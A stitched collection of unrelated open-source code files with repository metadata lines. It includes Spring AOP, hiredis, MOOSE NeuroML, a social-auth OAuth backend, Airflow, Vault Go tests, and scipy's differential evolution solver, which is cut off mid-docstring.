		case DestDebug:
		case DestSPI:
		case DestTuplestore:
		case DestIntoRel:
		case DestCopyOut:
		case DestSQLFunction:
		case DestTransientRel:
		case DestTupleQueue:
		case DestExplainSerialize:
			/* no frontend connection; nothing to report */
			break;
	}
}
# File generated from our OpenAPI spec by Stainless. See CONTRIBUTING.md for details.
from __future__ import annotations
from typing_extensions import Literal, Required, TypedDict
__all__ = ["ResponseFormatText"]
class ResponseFormatText(TypedDict, total=False):
"""Default response format. Used to generate text responses."""
type: Required[Literal["text"]]
"""The type of response format being defined. Always `text`.""" | python | github | https://github.com/openai/openai-python | src/openai/types/shared_params/response_format_text.py |
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.aop.support.annotation;
import java.lang.annotation.Annotation;
import org.jspecify.annotations.Nullable;
import org.springframework.aop.ClassFilter;
import org.springframework.core.annotation.AnnotatedElementUtils;
import org.springframework.util.Assert;
/**
* Simple ClassFilter that looks for a specific annotation being present on a class.
*
* @author Juergen Hoeller
* @since 2.0
* @see AnnotationMatchingPointcut
*/
public class AnnotationClassFilter implements ClassFilter {
private final Class<? extends Annotation> annotationType;
private final boolean checkInherited;
/**
* Create a new AnnotationClassFilter for the given annotation type.
* @param annotationType the annotation type to look for
*/
public AnnotationClassFilter(Class<? extends Annotation> annotationType) {
this(annotationType, false);
}
/**
* Create a new AnnotationClassFilter for the given annotation type.
* @param annotationType the annotation type to look for
* @param checkInherited whether to also check the superclasses and
* interfaces as well as meta-annotations for the annotation type
* (i.e. whether to use {@link AnnotatedElementUtils#hasAnnotation}
* semantics instead of standard Java {@link Class#isAnnotationPresent})
*/
public AnnotationClassFilter(Class<? extends Annotation> annotationType, boolean checkInherited) {
Assert.notNull(annotationType, "Annotation type must not be null");
this.annotationType = annotationType;
this.checkInherited = checkInherited;
}
@Override
public boolean matches(Class<?> clazz) {
return (this.checkInherited ? AnnotatedElementUtils.hasAnnotation(clazz, this.annotationType) :
clazz.isAnnotationPresent(this.annotationType));
}
@Override
public boolean equals(@Nullable Object other) {
return (this == other || (other instanceof AnnotationClassFilter otherCf &&
this.annotationType.equals(otherCf.annotationType) &&
this.checkInherited == otherCf.checkInherited));
}
@Override
public int hashCode() {
return this.annotationType.hashCode();
}
@Override
public String toString() {
return getClass().getName() + ": " + this.annotationType;
}
} | java | github | https://github.com/spring-projects/spring-framework | spring-aop/src/main/java/org/springframework/aop/support/annotation/AnnotationClassFilter.java |
lazy import test.test_import.data.lazy_imports.basic2 as basic2
def f():
x = globals()
return x['basic2'].resolve()
f() | python | github | https://github.com/python/cpython | Lib/test/test_import/data/lazy_imports/lazy_get_value.py |
#ifndef __HIREDIS_IVYKIS_H__
#define __HIREDIS_IVYKIS_H__
#include <iv.h>
#include "../hiredis.h"
#include "../async.h"
typedef struct redisIvykisEvents {
redisAsyncContext *context;
struct iv_fd fd;
} redisIvykisEvents;
static void redisIvykisReadEvent(void *arg) {
redisAsyncContext *context = (redisAsyncContext *)arg;
redisAsyncHandleRead(context);
}
static void redisIvykisWriteEvent(void *arg) {
redisAsyncContext *context = (redisAsyncContext *)arg;
redisAsyncHandleWrite(context);
}
static void redisIvykisAddRead(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_in(&e->fd, redisIvykisReadEvent);
}
static void redisIvykisDelRead(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_in(&e->fd, NULL);
}
static void redisIvykisAddWrite(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_out(&e->fd, redisIvykisWriteEvent);
}
static void redisIvykisDelWrite(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_out(&e->fd, NULL);
}
static void redisIvykisCleanup(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_unregister(&e->fd);
hi_free(e);
}
static int redisIvykisAttach(redisAsyncContext *ac) {
redisContext *c = &(ac->c);
redisIvykisEvents *e;
/* Nothing should be attached when something is already attached */
if (ac->ev.data != NULL)
return REDIS_ERR;
/* Create container for context and r/w events */
e = (redisIvykisEvents*)hi_malloc(sizeof(*e));
if (e == NULL)
return REDIS_ERR;
e->context = ac;
/* Register functions to start/stop listening for events */
ac->ev.addRead = redisIvykisAddRead;
ac->ev.delRead = redisIvykisDelRead;
ac->ev.addWrite = redisIvykisAddWrite;
ac->ev.delWrite = redisIvykisDelWrite;
ac->ev.cleanup = redisIvykisCleanup;
ac->ev.data = e;
/* Initialize and install read/write events */
IV_FD_INIT(&e->fd);
e->fd.fd = c->fd;
e->fd.handler_in = redisIvykisReadEvent;
e->fd.handler_out = redisIvykisWriteEvent;
e->fd.handler_err = NULL;
e->fd.cookie = e->context;
iv_fd_register(&e->fd);
return REDIS_OK;
}
#endif | c | github | https://github.com/redis/redis | deps/hiredis/adapters/ivykis.h |
## Description: class NeuroML for loading NeuroML from single file into MOOSE
## Version 1.0 by Aditya Gilra, NCBS, Bangalore, India, 2011 for serial MOOSE
## Version 1.5 by Niraj Dudani, NCBS, Bangalore, India, 2012, ported to parallel MOOSE
## Version 1.6 by Aditya Gilra, NCBS, Bangalore, India, 2012, further changes for parallel MOOSE
"""
NeuroML.py is the preferred interface to read NeuroML files.
Instantiate NeuroML class, and thence use method:
readNeuroMLFromFile(...) to load NeuroML from a file:
(a) the file could contain all required levels 1, 2 and 3 - Morph, Channel and Network;
OR
(b) the file could have only L3 (network) with L2 (channels/synapses) and L1 (cells) spread over multiple files;
these multiple files should be in the same or lower-level directory
named as <chan/syn_name>.xml or <cell_name>.xml or <cell_name>.morph.xml
(essentially as generated by neuroConstruct's export).
OR
(c) the file could contain only L2 (MorphML) or only L1 (ChannelML),
in which case the loader reads them into /library or at the path passed in.
OR
(d) your lower level L1 and L2 xml files could be scattered in non-hierarchical directories,
then you can use this reader to load the ChannelML files individually into /library,
then this reader to load MorphML files into /library.
Store the cellDict returned for each cell, and combine them into a larger cellsDict as below,
and finally call this reader on the NetworkML file passing the cellsDict.
[OR you can use the separate Channel, Morph and NetworkML loaders in moose.neuroml.<...>
to load each level files individually i.e. first load ChannelML files into /library,
then cells from MorphML and, finally the NetworkML.]
For testing, you can also call this from the command line with a neuroML file as argument.
However, the new relative import .ChannelML breaks calling it from commandline,
so have to do it on python / ipython terminal:
In [1]: import moose
In [2]: import moose.neuroml
In [3]: moose.neuroml.loadNeuroML_L123('Generated.net.xml')
"""
from __future__ import print_function
import moose
from moose.utils import *
from xml.etree import cElementTree as ET
from moose.neuroml.ChannelML import ChannelML
from moose.neuroml.MorphML import MorphML
from moose.neuroml.NetworkML import NetworkML
from moose.neuroml.utils import *
import sys
from os import path
import logging
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
_logger = logging.getLogger('moose.nml.neuroml')
_logger.addHandler(console)
class NeuroML():
def __init__(self):
pass
def readNeuroMLFromFile(self,filename,params={},cellsDict={}):
"""
For the format of params required to tweak what cells are loaded,
refer to the doc string of NetworkML.readNetworkMLFromFile().
Returns (populationDict,projectionDict),
see doc string of NetworkML.readNetworkML() for details.
"""
_logger.info("Loading neuroml file %s " % filename)
moose.Neutral('/library') # creates /library in MOOSE tree; elif present, wraps
tree = ET.parse(filename)
root_element = tree.getroot()
self.model_dir = path.dirname( path.abspath( filename ) )
if 'lengthUnits' in list(root_element.attrib.keys()):
self.lengthUnits = root_element.attrib['lengthUnits']
else:
self.lengthUnits = 'micrometer'
## lots of gymnastics to check if temperature meta tag is present
self.temperature = CELSIUS_default # gets replaced below if tag for temperature is present
self.temperature_default = True
for meta_property in root_element.findall('.//{'+meta_ns+'}property'):
## tag can be an attrib or an element
if 'tag' in list(meta_property.attrib.keys()): # tag is an attrib
tagname = meta_property.attrib['tag']
if 'temperature' in tagname:
self.temperature = float(meta_property.attrib['value'])
self.temperature_default = False
else: # tag is a separate element
tag = meta_property.find('.//{'+meta_ns+'}tag')
tagname = tag.text
if 'temperature' in tagname:
## value can be a tag or an element
if 'value' in list(tag.attrib.keys()): # value is an attrib
self.temperature = float(tag.attrib['value'])
self.temperature_default = False
else: # value is a separate element
self.temperature = float(tag.find('.//{'+meta_ns+'}value').text)
self.temperature_default = False
if self.temperature_default:
_logger.info("Using default temperature of %s degree Celsius" % self.temperature)
self.nml_params = {
'temperature':self.temperature,
'model_dir':self.model_dir,
}
_logger.debug("Loading channels and synapses into MOOSE /library ...")
cmlR = ChannelML(self.nml_params)
for channels in root_element.findall('.//{'+neuroml_ns+'}channels'):
self.channelUnits = channels.attrib['units']
for channel in channels.findall('.//{'+cml_ns+'}channel_type'):
## ideally I should read in extra params
## from within the channel_type element and put those in also.
## Global params should override local ones.
cmlR.readChannelML(channel,params=params,units=self.channelUnits)
for synapse in channels.findall('.//{'+cml_ns+'}synapse_type'):
cmlR.readSynapseML(synapse,units=self.channelUnits)
for ionConc in channels.findall('.//{'+cml_ns+'}ion_concentration'):
cmlR.readIonConcML(ionConc,units=self.channelUnits)
_logger.debug("Loading cell definitions into MOOSE /library ...")
mmlR = MorphML(self.nml_params)
self.cellsDict = cellsDict
for cells in root_element.findall('.//{'+neuroml_ns+'}cells'):
for cell in cells.findall('.//{'+neuroml_ns+'}cell'):
cellDict = mmlR.readMorphML(cell,params=params,lengthUnits=self.lengthUnits)
self.cellsDict.update(cellDict)
## check if there are populations in this NML files,
## if not, it's a MorphML or ChannelML file, not NetworkML, so skip.
if root_element.find('.//{'+neuroml_ns+'}populations') is None \
and root_element.find('.//{'+nml_ns+'}populations') is None:
return (self.cellsDict,'no populations (L3 NetworkML) found.')
else:
_logger.debug("Loading individual cells into MOOSE root ... ")
nmlR = NetworkML(self.nml_params)
return nmlR.readNetworkML(root_element,self.cellsDict,\
params=params,lengthUnits=self.lengthUnits)
## cellsDict = { cellname: (segDict, cableDict), ... } # multiple cells
## where segDict = { segid1 : [ segname,(proximalx,proximaly,proximalz),
## (distalx,distaly,distalz),diameter,length,[potential_syn1, ... ] ] , ... }
## segname is "<name>_<segid>" because 1) guarantees uniqueness,
## & 2) later scripts obtain segid from the compartment's name!
## and cableDict = { cablegroupname : [campartment1name, compartment2name, ... ], ... }
self.cellsDict = nmlR.cellSegmentDict
def loadNeuroML_L123(filename):
neuromlR = NeuroML()
return neuromlR.readNeuroMLFromFile(filename)
if __name__ == "__main__":
if len(sys.argv)<2:
_logger.error("You need to specify the neuroml filename.")
sys.exit(1)
print(loadNeuroML_L123(sys.argv[1])) | unknown | codeparrot/codeparrot-clean | ||
from urllib import urlencode
import six
from requests_oauthlib import OAuth1
from social.backends.oauth import BaseOAuth2
class NKOAuth2(BaseOAuth2):
"""NK OAuth authentication backend"""
name = 'nk'
AUTHORIZATION_URL = 'https://nk.pl/oauth2/login'
ACCESS_TOKEN_URL = 'https://nk.pl/oauth2/token'
SCOPE_SEPARATOR = ','
ACCESS_TOKEN_METHOD = 'POST'
SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER'
EXTRA_DATA = [
('id', 'id'),
]
def get_user_details(self, response):
"""Return user details from NK account"""
entry = response['entry']
return {
'username': entry.get('displayName'),
'email': entry['emails'][0]['value'],
'first_name': entry.get('displayName').split(' ')[0],
'id': entry.get('id')
}
def auth_complete_params(self, state=None):
client_id, client_secret = self.get_key_and_secret()
return {
'grant_type': 'authorization_code', # request auth code
'code': self.data.get('code', ''), # server response code
'client_id': client_id,
'client_secret': client_secret,
'redirect_uri': self.get_redirect_uri(state),
'scope': self.get_scope_argument()
}
def get_user_id(self, details, response):
"""Return a unique ID for the current user, by default from server
response."""
return details.get(self.ID_KEY)
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from service"""
url = 'http://opensocial.nk-net.pl/v09/social/rest/people/@me?' + urlencode({
'nk_token': access_token,
'fields': 'name,surname,avatar,localization,age,gender,emails,birthdate'
})
return self.get_json(
url,
auth=self.oauth_auth(access_token)
)
def oauth_auth(self, token=None, oauth_verifier=None,
signature_type=SIGNATURE_TYPE_AUTH_HEADER):
key, secret = self.get_key_and_secret()
oauth_verifier = oauth_verifier or self.data.get('oauth_verifier')
token = token or {}
# decoding='utf-8' produces errors with python-requests on Python3
# since the final URL will be of type bytes
decoding = None if six.PY3 else 'utf-8'
state = self.get_or_create_state()
return OAuth1(key, secret,
resource_owner_key=None,
resource_owner_secret=None,
callback_uri=self.get_redirect_uri(state),
verifier=oauth_verifier,
signature_type=signature_type,
decoding=decoding) | unknown | codeparrot/codeparrot-clean | ||
import math
import numpy
def normalise(a):
'''
Normalises a vector
Accepts: a numpy vector
Returns: a numpy vector pointing in the same direction with magnitude 1
'''
a_norm = numpy.linalg.norm(a)
return numpy.array([float(each)/a_norm for each in a])
def rotation_axis_angle(axis, angle):
'''
Returns the 3x3 matrix for rotation by an angle around an axis
Accepts: an axis as a numpy array, and an angle in radians
Returns: a rotation matrix as a numpy array
'''
sin = math.sin(angle)
cos = math.cos(angle)
comp = 1 - cos
x, y, z = normalise(axis)
mat = numpy.array([[(cos + x*x*comp), (x*y*comp - z*sin), (x*z*comp + y*sin)],
[(y*x*comp + z*sin), (cos + y*y*comp), (y*z*comp - x*sin)],
[(z*x*comp - y*sin), (z*y*comp + x*sin), (cos + z*z*comp)]])
should_be_I = mat.dot(mat.transpose())
I = numpy.ma.identity(3)
numpy.testing.assert_array_almost_equal(I, should_be_I, 3)
return mat
def rotation_from_axes(ax1, ax2): # To test
'''
Calculate the matrix to rotate one vector to another
Accepts: two 3-vectors as numpy arrays
Returns: a rotation matrix as a numpy array
'''
# Probably a more numpy-ish way of doing this
if max(numpy.absolute(ax1 - ax2)) < 1E-7:
return numpy.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
elif max(numpy.absolute(ax1 + ax2)) < 1E-7:
ang = angle_between(ax1, ax2)
z = math.sqrt(1/(1 + (ax1[2]/ax1[1])**2))
y = math.sqrt(1 - z**2)
rot_ax = numpy.array([0, y, z])
return rotation_axis_angle(rot_ax, ang)
else:
ang = angle_between(ax1, ax2)
rot_ax = numpy.cross(ax1, ax2)
return rotation_axis_angle(rot_ax, ang)
def angle_between(vec1, vec2):
'''
Calculate the angle between two vectors
Accepts: two vectors as numpy arrays
Returns: the angle in radians
'''
return math.acos(float(vec1.dot(vec2)) /
(numpy.linalg.norm(vec1) * numpy.linalg.norm(vec2)))
def reflection_plane(vec1, vec2):
'''
Returns the Householder reflection matrix for reflection through
a plane
Accepts: two non-parallel vectors in the plane as numpy arrays
Returns: the 3x3 reflection matrix as a numpy array
'''
norm = numpy.cross(vec1, vec2)
a, b, c = normalise(norm)
return numpy.array([[1 - 2*a*a, -2*a*b, -2*a*c],
[-2*a*b, 1-2*b*b, -2*b*c],
[-2*a*c, -2*b*c, 1-2*c*c]]) | unknown | codeparrot/codeparrot-clean | ||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from typing import TYPE_CHECKING, Protocol, runtime_checkable
if TYPE_CHECKING:
from collections.abc import Iterable
from airflow.serialization.definitions.mappedoperator import Operator
@runtime_checkable
class ReferenceMixin(Protocol):
"""
Mixin for things that references a task.
This should be implemented by things that reference operators and use them
to lazily resolve values at runtime. The most prominent examples are XCom
references (XComArg).
This is a partial interface to the SDK's ResolveMixin with the resolve()
method removed since the scheduler should not need to resolve the reference.
"""
def iter_references(self) -> Iterable[tuple[Operator, str]]:
"""
Find underlying XCom references this contains.
This is used by the DAG parser to recursively find task dependencies.
:meta private:
"""
raise NotImplementedError | python | github | https://github.com/apache/airflow | airflow-core/src/airflow/models/referencemixin.py |
// Copyright IBM Corp. 2016, 2025
// SPDX-License-Identifier: BUSL-1.1
package vault
import (
"context"
"testing"
"time"
"github.com/hashicorp/vault/version"
)
// TestVersionStore_StoreMultipleVaultVersions writes multiple versions of 1.9.0 and verifies that only
// the original timestamp is stored.
func TestVersionStore_StoreMultipleVaultVersions(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
upgradeTimePlusEpsilon := time.Now().UTC()
vaultVersion := &VaultVersion{
Version: version.Version,
TimestampInstalled: upgradeTimePlusEpsilon.Add(30 * time.Hour),
}
wasStored, err := c.storeVersionEntry(context.Background(), vaultVersion, false)
if err != nil || wasStored {
t.Fatalf("vault version was re-stored: %v, err is: %s", wasStored, err.Error())
}
versionEntry, ok := c.versionHistory[version.Version]
if !ok {
t.Fatalf("no %s version timestamp found", version.Version)
}
if versionEntry.TimestampInstalled.After(upgradeTimePlusEpsilon) {
t.Fatalf("upgrade time for %s is incorrect: got %+v, expected less than %+v", version.Version, versionEntry.TimestampInstalled, upgradeTimePlusEpsilon)
}
}
// TestVersionStore_GetOldestVersion verifies that FindOldestVersionTimestamp finds the oldest
// (in time) vault version stored.
func TestVersionStore_GetOldestVersion(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
upgradeTimePlusEpsilon := time.Now().UTC()
// 1.6.2 is stored before 1.6.1, so even though it is a higher number, it should be returned.
versionEntries := []VaultVersion{
{Version: "1.6.2", TimestampInstalled: upgradeTimePlusEpsilon.Add(-4 * time.Hour)},
{Version: "1.6.1", TimestampInstalled: upgradeTimePlusEpsilon.Add(2 * time.Hour)},
}
for _, entry := range versionEntries {
_, err := c.storeVersionEntry(context.Background(), &entry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", entry, err.Error())
}
}
err := c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 3 {
t.Fatalf("expected 3 entries in timestamps map after refresh, found: %d", len(c.versionHistory))
}
v, tm, err := c.FindOldestVersionTimestamp()
if err != nil {
t.Fatal(err)
}
if v != "1.6.2" {
t.Fatalf("expected 1.6.2, found: %s", v)
}
if tm.Before(upgradeTimePlusEpsilon.Add(-6*time.Hour)) || tm.After(upgradeTimePlusEpsilon.Add(-2*time.Hour)) {
t.Fatalf("incorrect upgrade time logged: %v", tm)
}
}
// TestVersionStore_IsNewInstall consults the version store to see if version
// history is empty. This property should hold during early unseal of a new
// Vault installation.
func TestVersionStore_IsNewInstall(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
now := time.Now().UTC()
// Remove version history to simulate early unseal
vaultVersionPath := "core/versions/"
key := vaultVersionPath + version.Version
if err := c.barrier.Delete(context.Background(), key); err != nil {
t.Fatal(err)
}
// delete the version from the map as well
delete(c.versionHistory, version.Version)
if newInstall := c.IsNewInstall(c.activeContext); !newInstall {
t.Fatal("expected IsNewInstall to return 'true', but got 'false'")
}
firstEntry := &VaultVersion{Version: "1.16.0", TimestampInstalled: now}
if _, err := c.storeVersionEntry(context.Background(), firstEntry, false); err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", firstEntry, err.Error())
}
if err := c.loadVersionHistory(c.activeContext); err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 1 {
t.Fatalf("expected 1 entry in timestamps map after refresh, found: %d", len(c.versionHistory))
}
secondEntry := &VaultVersion{Version: "1.13.0", TimestampInstalled: now}
_, err := c.storeVersionEntry(context.Background(), secondEntry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", secondEntry, err.Error())
}
err = c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 2 {
t.Fatalf("expected 2 entry in timestamps map after refresh, found: %d", len(c.versionHistory))
}
if newInstall := c.IsNewInstall(c.activeContext); newInstall {
t.Fatal("expected IsNewInstall to return 'false', but got 'true'")
}
}
// TestVersionStore_GetNewestVersion verifies that FindNewestVersionTimestamp finds the newest
// (in time) vault version stored.
func TestVersionStore_GetNewestVersion(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
upgradeTimePlusEpsilon := time.Now().UTC()
// 1.6.1 is stored after 1.6.2, so even though it is a lower number, it should be returned.
versionEntries := []VaultVersion{
{Version: "1.6.2", TimestampInstalled: upgradeTimePlusEpsilon.Add(-4 * time.Hour)},
{Version: "1.6.1", TimestampInstalled: upgradeTimePlusEpsilon.Add(2 * time.Hour)},
}
for _, entry := range versionEntries {
_, err := c.storeVersionEntry(context.Background(), &entry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", entry, err.Error())
}
}
err := c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 3 {
t.Fatalf("expected 3 entries in timestamps map after refresh, found: %d", len(c.versionHistory))
}
v, tm, err := c.FindNewestVersionTimestamp()
if err != nil {
t.Fatal(err)
}
if v != "1.6.1" {
t.Fatalf("expected 1.6.1, found: %s", v)
}
if tm.Before(upgradeTimePlusEpsilon.Add(1*time.Hour)) || tm.After(upgradeTimePlusEpsilon.Add(3*time.Hour)) {
t.Fatalf("incorrect upgrade time logged: %v", tm)
}
}
func TestVersionStore_SelfHealUTC(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
estLoc, err := time.LoadLocation("EST")
if err != nil {
t.Fatalf("failed to load location, err: %s", err.Error())
}
nowEST := time.Now().In(estLoc)
versionEntries := []VaultVersion{
{Version: "1.9.0", TimestampInstalled: nowEST.Add(24 * time.Hour)},
{Version: "1.9.1", TimestampInstalled: nowEST.Add(48 * time.Hour)},
}
for _, entry := range versionEntries {
_, err := c.storeVersionEntry(context.Background(), &entry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", entry, err.Error())
}
}
err = c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to load version timestamps, err: %s", err.Error())
}
for _, entry := range c.versionHistory {
if entry.TimestampInstalled.Location() != time.UTC {
t.Fatalf("failed to convert %s timestamp %s to UTC", entry.Version, entry.TimestampInstalled)
}
}
} | go | github | https://github.com/hashicorp/vault | vault/version_store_test.go |
"""
differential_evolution: The differential evolution global optimization algorithm
Added by Andrew Nelson 2014
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.optimize import OptimizeResult, minimize
from scipy.optimize.optimize import _status_message
import numbers
__all__ = ['differential_evolution']
_MACHEPS = np.finfo(np.float64).eps
def differential_evolution(func, bounds, args=(), strategy='best1bin',
maxiter=1000, popsize=15, tol=0.01,
mutation=(0.5, 1), recombination=0.7, seed=None,
callback=None, disp=False, polish=True,
init='latinhypercube'):
"""Finds the global minimum of a multivariate function.
Differential Evolution is stochastic in nature (does not use gradient
methods) to find the minimium, and can search large areas of candidate
space, but often requires larger numbers of function evaluations than
conventional gradient based techniques.
The algorithm is due to Storn and Price [1]_.
Parameters
----------
func : callable
The objective function to be minimized. Must be in the form
``f(x, *args)``, where ``x`` is the argument in the form of a 1-D array
and ``args`` is a tuple of any additional fixed parameters needed to
completely specify the function.
bounds : sequence
Bounds for variables. ``(min, max)`` pairs for each element in ``x``,
defining the lower and upper bounds for the optimizing argument of
`func`. It is required to have ``len(bounds) == len(x)``.
``len(bounds)`` is used to determine the number of parameters in ``x``.
args : tuple, optional
Any additional fixed parameters needed to
completely specify the objective function.
strategy : str, optional
The differential evolution strategy to use. Should be one of:
- 'best1bin'
- 'best1exp'
- 'rand1exp'
- 'randtobest1exp'
- 'best2exp'
- 'rand2exp'
- 'randtobest1bin'
- 'best2bin'
- 'rand2bin'
- 'rand1bin'
The default is 'best1bin'.
maxiter : int, optional
The maximum number of generations over which the entire population is
evolved. The maximum number of function evaluations (with no polishing)
is: ``(maxiter + 1) * popsize * len(x)``
popsize : int, optional
A multiplier for setting the total population size. The population has
``popsize * len(x)`` individuals.
tol : float, optional
When the mean of the population energies, multiplied by tol,
divided by the standard deviation of the population energies
is greater than 1 the solving process terminates:
``convergence = mean(pop) * tol / stdev(pop) > 1``
mutation : float or tuple(float, float), optional
The mutation constant. In the literature this is also known as
differential weight, being denoted by F.
If specified as a float it should be in the range [0, 2].
If specified as a tuple ``(min, max)`` dithering is employed. Dithering
randomly changes the mutation constant on a generation by generation
basis. The mutation constant for that generation is taken from
``U[min, max)``. Dithering can help speed convergence significantly.
Increasing the mutation constant increases the search radius, but will
slow down convergence.
recombination : float, optional
The recombination constant, should be in the range [0, 1]. In the
literature this is also known as the crossover probability, being
denoted by CR. Increasing this value allows a larger number of mutants
to progress into the next generation, but at the risk of population
stability.
seed : int or `np.random.RandomState`, optional
If `seed` is not specified the `np.RandomState` singleton is used.
If `seed` is an int, a new `np.random.RandomState` instance is used,
seeded with seed.
If `seed` is already a `np.random.RandomState instance`, then that
`np.random.RandomState` instance is used.
Specify `seed` for repeatable minimizations.
disp : bool, optional
Display status messages
callback : callable, `callback(xk, convergence=val)`, optional
A function to follow the progress of the minimization. ``xk`` is
the current value of ``x0``. ``val`` represents the fractional
value of the population convergence. When ``val`` is greater than one
the function halts. If callback returns `True`, then the minimization
is halted (any polishing is still carried out).
polish : bool, optional
If True (default), then `scipy.optimize.minimize` with the `L-BFGS-B`
method is used to polish the best population member at the end, which
can improve the minimization slightly.
init : string, optional
Specify how the population initialization is performed. Should be
one of:
- 'latinhypercube'
- 'random'
The default is 'latinhypercube'. Latin Hypercube sampling tries to
maximize coverage of the available parameter space. 'random' initializes
the population randomly - this has the drawback that clustering can
occur, preventing the whole of parameter space being covered.
Returns
-------
res : OptimizeResult
The optimization result represented as a `OptimizeResult` object.
Important attributes are: ``x`` the solution array, ``success`` a
Boolean flag indicating if the optimizer exited successfully and
``message`` which describes the cause of the termination. See
`OptimizeResult` for a description of other attributes. If `polish`
was employed, and a lower minimum was obtained by the polishing, then
OptimizeResult also contains the ``jac`` attribute.
Notes
-----
Differential evolution is a stochastic population based method that is
useful for global optimization problems. At each pass through the population
the algorithm mutates each candidate solution by mixing with other candidate
solutions to create a trial candidate. There are several strategies [2]_ for
creating trial candidates, which suit some problems more than others. The
'best1bin' strategy is a good starting point for many systems. In this
strategy two members of the population are randomly chosen. Their difference
is used to mutate the best member (the `best` in `best1bin`), :math:`b_0`,
so far:
.. math::
b' = b_0 + mutation * (population[rand0] - population[rand1])
A trial vector is then constructed. Starting with a randomly chosen 'i'th
parameter the trial is sequentially filled (in modulo) with parameters from
`b'` or the original candidate. The choice of whether to use `b'` or the
original candidate is made with a binomial distribution (the 'bin' in
'best1bin') - a random number in [0, 1) is generated. If this number is
less than the `recombination` constant then the parameter is loaded from
`b'`, otherwise it is loaded from the original candidate. The final
parameter is always loaded from `b'`. Once the trial candidate is built
its fitness is assessed. If the trial is better than the original candidate
then it takes its place. If it is also better than the best overall
candidate it also replaces that.
To improve your chances of finding a global minimum use higher `popsize`
values, with higher `mutation` and (dithering), but lower `recombination`
values. This has the effect of widening the search radius, but slowing
convergence.
.. versionadded:: 0.15.0
Examples
--------
Let us consider the problem of minimizing the Rosenbrock function. This
function is implemented in `rosen` in `scipy.optimize`.
>>> from scipy.optimize import rosen, differential_evolution
>>> bounds = [(0,2), (0, 2), (0, 2), (0, 2), (0, 2)]
>>> result = differential_evolution(rosen, bounds)
>>> result.x, result.fun
(array([1., 1., 1., 1., 1.]), 1.9216496320061384e-19)
Next find the minimum of the Ackley function
(http://en.wikipedia.org/wiki/Test_functions_for_optimization).
>>> from scipy.optimize import differential_evolution
>>> import numpy as np
>>> def ackley(x):
... arg1 = -0.2 * np.sqrt(0.5 * (x[0] ** 2 + x[1] ** 2))
... arg2 = 0.5 * (np.cos(2. * np.pi * x[0]) + np.cos(2. * np.pi * x[1]))
... return -20. * np.exp(arg1) - np.exp(arg2) + 20. + np.e
>>> bounds = [(-5, 5), (-5, 5)]
>>> result = differential_evolution(ackley, bounds)
>>> result.x, result.fun
(array([ 0., 0.]), 4.4408920985006262e-16)
References
----------
.. [1] Storn, R and Price, K, Differential Evolution - a Simple and
Efficient Heuristic for Global Optimization over Continuous Spaces,
Journal of Global Optimization, 1997, 11, 341 - 359.
.. [2] http://www1.icsi.berkeley.edu/~storn/code.html
.. [3] http://en.wikipedia.org/wiki/Differential_evolution
"""
solver = DifferentialEvolutionSolver(func, bounds, args=args,
strategy=strategy, maxiter=maxiter,
popsize=popsize, tol=tol,
mutation=mutation,
recombination=recombination,
seed=seed, polish=polish,
callback=callback,
disp=disp,
init=init)
return solver.solve()
class DifferentialEvolutionSolver(object):
    """This class implements the differential evolution solver
    Parameters
    ----------
    func : callable
        The objective function to be minimized. Must be in the form
        ``f(x, *args)``, where ``x`` is the argument in the form of a 1-D array
        and ``args`` is a tuple of any additional fixed parameters needed to
        completely specify the function.
    bounds : sequence
        Bounds for variables. ``(min, max)`` pairs for each element in ``x``,
        defining the lower and upper bounds for the optimizing argument of
        `func`. It is required to have ``len(bounds) == len(x)``.
        ``len(bounds)`` is used to determine the number of parameters in ``x``.
    args : tuple, optional
        Any additional fixed parameters needed to
        completely specify the objective function.
    strategy : str, optional
        The differential evolution strategy to use. Should be one of:
